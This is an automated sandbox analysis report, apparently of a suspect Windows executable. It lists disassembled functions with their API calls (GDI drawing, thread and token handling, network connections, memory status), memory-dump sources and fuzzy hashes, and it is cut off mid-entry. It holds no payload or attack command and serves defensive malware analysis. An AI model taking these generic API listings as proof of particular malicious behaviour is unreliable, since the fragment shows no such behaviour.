                                                                                                                                                                            Function 004C6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 004C6E88
                                                                                                                                                                              • Part of subcall function 004C794E: _memset.LIBCMT ref: 004C7983
                                                                                                                                                                            • _memmove.LIBCMT ref: 004C6EAB
                                                                                                                                                                            • _memset.LIBCMT ref: 004C6EB8
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 004C6EC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 48991266-0
                                                                                                                                                                            • Opcode ID: a22e8e0127f811a6dabddb42ec0e0b45d7154b8d4c9e3686f569328e25fabbcd
                                                                                                                                                                            • Instruction ID: 1dd1e67bc3d6aaad0841117c446db0b469362cdd9f7b15d26dc18af50977b77c
                                                                                                                                                                            • Opcode Fuzzy Hash: a22e8e0127f811a6dabddb42ec0e0b45d7154b8d4c9e3686f569328e25fabbcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0547A100200ABCF416F55DC85F49BB29EF45324B14C06AFE085E22BC735A911DBB8
                                                                                                                                                                            Function 004EC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046135C
                                                                                                                                                                              • Part of subcall function 004612F3: BeginPath.GDI32(?), ref: 00461373
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046139C
                                                                                                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004EC030
                                                                                                                                                                            • LineTo.GDI32(00000000,?,?), ref: 004EC03D
                                                                                                                                                                            • EndPath.GDI32(00000000), ref: 004EC04D
                                                                                                                                                                            • StrokePath.GDI32(00000000), ref: 004EC05B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                            • Opcode ID: e82b03850e7cb8ff71cc04b156e5349d9c6277a1047131c0fd594444f9a24ee3
                                                                                                                                                                            • Instruction ID: f2d1e0fd2511e21b0d88baac9b8845f162b0fb41cb1e141d75d429c6bb89e2b0
                                                                                                                                                                            • Opcode Fuzzy Hash: e82b03850e7cb8ff71cc04b156e5349d9c6277a1047131c0fd594444f9a24ee3
                                                                                                                                                                            • Instruction Fuzzy Hash: E9F0E232001299FBDB226F91AC09FCE3F99AF06311F048051FB11250E28779066ADFDD
                                                                                                                                                                            Function 004BA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004BA399
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 004BA3AC
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004BA3B3
                                                                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004BA3BA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                            • Opcode ID: a9a4d83e2973960aa471d0643689ebc9a9ad5845e0461909a15b6852a519885b
                                                                                                                                                                            • Instruction ID: 32056ef287100649c08ce8e98f7680c66c7407d5c3c234a47b21e3d6b8d17092
                                                                                                                                                                            • Opcode Fuzzy Hash: a9a4d83e2973960aa471d0643689ebc9a9ad5845e0461909a15b6852a519885b
                                                                                                                                                                            • Instruction Fuzzy Hash: 14E03931141368BBDB201BA2DC4CEDB7F5CEF167A1F008035F908880A1C6758956CBB9
                                                                                                                                                                            Function 00462218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 00462231
                                                                                                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 0046223B
                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00462250
                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00462258
                                                                                                                                                                            • GetWindowDC.USER32(?,00000000), ref: 0049C0D3
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0049C0E0
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0049C0F9
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0049C112
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0049C132
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0049C13D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1946975507-0
                                                                                                                                                                            • Opcode ID: 51917bb9c0a346b6a2cca9f39127d2dc7323d672096295c79205a5ec728df155
                                                                                                                                                                            • Instruction ID: f79055b472d1e2968df152dce89d0e864cea5f69913d96e084b688b231f2efdf
                                                                                                                                                                            • Opcode Fuzzy Hash: 51917bb9c0a346b6a2cca9f39127d2dc7323d672096295c79205a5ec728df155
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE03031100184EAEF215FA4EC897D97B14AB15332F008376FA69480E287754984DB15
                                                                                                                                                                            Function 004B8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 004B8C63
                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C6A
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004B882E), ref: 004B8C77
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3974789173-0
                                                                                                                                                                            • Opcode ID: 3a6a348dc4db475639b1bfd928d4c6555d3bb322f75e297d6163dd00aaa07cc6
                                                                                                                                                                            • Instruction ID: 4280dc30813be8d0b2872712d408855f3ed25ab814f127f95e7e0cdfb15fe8f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a6a348dc4db475639b1bfd928d4c6555d3bb322f75e297d6163dd00aaa07cc6
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE08676642251DBE7205FB06D4CBA73BBCEF50792F054838B645CD041DA348449CB75
                                                                                                                                                                            Function 004A2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004A2187
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004A2191
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004A21B1
                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 004A21D2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: aa18542899b351681b95e1ebb044b2666350107dd4765c553f53a0f09f807b77
                                                                                                                                                                            • Instruction ID: bad452c787539267f64522a4f01a01869c68b03810dca3a678be6bc4dc8a44ae
                                                                                                                                                                            • Opcode Fuzzy Hash: aa18542899b351681b95e1ebb044b2666350107dd4765c553f53a0f09f807b77
                                                                                                                                                                            • Instruction Fuzzy Hash: F9E01A75800244EFDB019FB0C888AAD7BF5FB5C351F10C42AF95A9B221DB7885469F4A
                                                                                                                                                                            Function 004A219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004A219B
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004A21A5
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004A21B1
                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 004A21D2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: e5dc35ff7b62c298e803410aa21eb7678f4e710ccdbb6d065319429d7b852137
                                                                                                                                                                            • Instruction ID: baf08c1a4641d59b18b78da9b5ba2a7be7848c38f527c82c8423b25dd72985ec
                                                                                                                                                                            • Opcode Fuzzy Hash: e5dc35ff7b62c298e803410aa21eb7678f4e710ccdbb6d065319429d7b852137
                                                                                                                                                                            • Instruction Fuzzy Hash: C9E01A75800244EFDB019FB0C88869D7BF5FB4C311F10C029F95A9B221DB7895469F49
                                                                                                                                                                            Function 004663A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: %O
                                                                                                                                                                            • API String ID: 0-3936426106
                                                                                                                                                                            • Opcode ID: 4920403e1851ffe4195d89b9eec2e13507eff4726aff84da7295b4c5022d42b1
                                                                                                                                                                            • Instruction ID: 37299a59bd0925fd803f4af6eb0ed9550d931c694a54a22bf35c4b0da97bdafb
                                                                                                                                                                            • Opcode Fuzzy Hash: 4920403e1851ffe4195d89b9eec2e13507eff4726aff84da7295b4c5022d42b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 64B1A271900109ABCF14EF99C8819EEBBB4EF44314F51412BE902A7295FB399D86CB5F
                                                                                                                                                                            Function 004DB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __itow_s
                                                                                                                                                                            • String ID: xrR$xrR
                                                                                                                                                                            • API String ID: 3653519197-2869713790
                                                                                                                                                                            • Opcode ID: a5359366b4a03273b68fa3699db7dde10b5c6c8a9316f05a53a87892b09132c9
                                                                                                                                                                            • Instruction ID: 32e4ce2b8a27fb252799234d42e07fffeb0f9167725c4213c9cab86cd63678b8
                                                                                                                                                                            • Opcode Fuzzy Hash: a5359366b4a03273b68fa3699db7dde10b5c6c8a9316f05a53a87892b09132c9
                                                                                                                                                                            • Instruction Fuzzy Hash: B6B19070A00109EBCB14DF55C8A1EAEB7B9FF58304F15805BF9459B392EB38E941CBA5
                                                                                                                                                                            Function 004CB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 004CB298
                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004CB361
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                            • String ID: LPT
                                                                                                                                                                            • API String ID: 3222508074-1350329615
                                                                                                                                                                            • Opcode ID: f6f6c35cf6a815564c8ba49e8a8a1ee0e6c883125998d19d64ef6a0a00834210
                                                                                                                                                                            • Instruction ID: c7e46d919615d0df6a3f6d97775684ed105fe32cb659c10ee8e21cbf96e32190
                                                                                                                                                                            • Opcode Fuzzy Hash: f6f6c35cf6a815564c8ba49e8a8a1ee0e6c883125998d19d64ef6a0a00834210
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E618275A00215AFCB14DF94C886FAEB7B4EB08310F15405FF846AB361D778AE45CB99
                                                                                                                                                                            Function 004A8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID: OaG
                                                                                                                                                                            • API String ID: 4104443479-282697018
                                                                                                                                                                            • Opcode ID: 2e4c3ccd492670544bb02a3a90cbedf26a41496c2e17e6afda5f6f7f999cc9ac
                                                                                                                                                                            • Instruction ID: 86efeeb6e0791ff54db2aad52b959703a10374b921248536920cbace98a164c3
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e4c3ccd492670544bb02a3a90cbedf26a41496c2e17e6afda5f6f7f999cc9ac
                                                                                                                                                                            • Instruction Fuzzy Hash: E8517EB0A00609DFCF24CF69C880AAEB7B1FF55304F14852EE85AD7340EB35A955CB55
                                                                                                                                                                            Function 00472AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00472AC8
                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00472AE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                            • Opcode ID: ad9f18423a69b480c6b397ba7e897c44669159c98ca2673c346d104127bf7a28
                                                                                                                                                                            • Instruction ID: ac0e830036d3a619842d5b97779894b3ca47c83edabf34485a7762797a21b82d
                                                                                                                                                                            • Opcode Fuzzy Hash: ad9f18423a69b480c6b397ba7e897c44669159c98ca2673c346d104127bf7a28
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C5168715187449BD320AF11D886BAFBBECFF94314F42885EF2D9410A1EB748928CB1B
                                                                                                                                                                            Function 004C99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0046506B: __fread_nolock.LIBCMT ref: 00465089
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C9AAE
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C9AC1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                            • String ID: FILE
                                                                                                                                                                            • API String ID: 4029003684-3121273764
                                                                                                                                                                            • Opcode ID: 7598e29caced4ca1bfc79a5025334dcfcafdf832905f64c4aed6b7386a17c876
                                                                                                                                                                            • Instruction ID: 6acfe5e0fb74f08d943fec08a6e2f59093b5b7bd6f18778f7807bfc380c07bab
                                                                                                                                                                            • Opcode Fuzzy Hash: 7598e29caced4ca1bfc79a5025334dcfcafdf832905f64c4aed6b7386a17c876
                                                                                                                                                                            • Instruction Fuzzy Hash: E341D875A00609BADF209AA1DC45FEFBBBDEF45714F00046FB900B7181D679AE0487A9
                                                                                                                                                                            Function 004A099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID: DtR$DtR
                                                                                                                                                                            • API String ID: 1473721057-1774046263
                                                                                                                                                                            • Opcode ID: c857f6a15f1d99947e55a827f0caaf5c27ac855d2e4b4632f272c16a48ca8958
                                                                                                                                                                            • Instruction ID: ea21f2af5bd66479cd46076c93e6da38491ca7938a9e84eab6eeb663806af007
